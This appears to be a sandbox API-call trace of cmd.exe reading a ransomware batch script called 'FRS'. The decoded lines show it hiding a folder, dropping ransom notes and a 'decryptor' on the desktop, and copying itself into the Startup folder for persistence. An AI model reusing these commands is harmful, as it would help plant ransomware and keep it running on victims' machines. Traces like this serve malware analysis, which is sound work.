SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0083.764] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0083.764] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.764] GetFileType (hFile=0x2a0) returned 0x1 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0083.764] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0083.764] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0083.764] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.764] GetFileType (hFile=0x2a0) returned 0x1 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0083.764] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0083.764] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0083.764] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.764] GetFileType (hFile=0x2a0) returned 0x1 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0083.764] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0083.765] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0083.765] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.765] GetFileType (hFile=0x2a0) returned 0x1 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0083.765] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0083.765] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0083.765] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.765] GetFileType (hFile=0x2a0) returned 0x1 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0083.765] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0083.765] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0083.765] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.765] GetFileType (hFile=0x2a0) returned 0x1 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0083.765] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0083.765] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0083.765] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.765] GetFileType (hFile=0x2a0) returned 0x1 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0083.765] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.765] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0083.766] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0083.766] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.766] GetFileType (hFile=0x2a0) returned 0x1 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0083.766] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0083.766] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0083.766] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.766] GetFileType (hFile=0x2a0) returned 0x1 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0083.766] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0083.766] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0083.766] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.766] GetFileType (hFile=0x2a0) returned 0x1 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0083.766] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0083.766] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0083.766] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.766] GetFileType (hFile=0x2a0) returned 0x1 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0083.766] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.766] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0083.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0083.767] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.767] GetFileType (hFile=0x2a0) returned 0x1 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0083.767] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0083.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0083.767] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.767] GetFileType (hFile=0x2a0) returned 0x1 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0083.767] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0083.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0083.767] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.767] GetFileType (hFile=0x2a0) returned 0x1 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0083.767] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0083.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0083.767] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.767] GetFileType (hFile=0x2a0) returned 0x1 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0083.767] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0083.767] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0083.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0083.768] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.768] GetFileType (hFile=0x2a0) returned 0x1 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0083.768] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0083.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0083.768] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.768] GetFileType (hFile=0x2a0) returned 0x1 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0083.768] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0083.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0083.768] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.768] GetFileType (hFile=0x2a0) returned 0x1 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0083.768] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0083.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0083.768] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.768] GetFileType (hFile=0x2a0) returned 0x1 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0083.768] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0083.768] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0083.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0083.769] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.769] GetFileType (hFile=0x2a0) returned 0x1 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0083.769] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0083.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0083.769] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.769] GetFileType (hFile=0x2a0) returned 0x1 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0083.769] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0083.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0083.769] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.769] GetFileType (hFile=0x2a0) returned 0x1 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0083.769] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0083.769] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0083.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0083.769] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0083.770] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.770] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0083.770] _get_osfhandle (_FileHandle=0) returned 0x24 [0083.770] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0083.770] SetConsoleInputExeNameW () returned 0x1 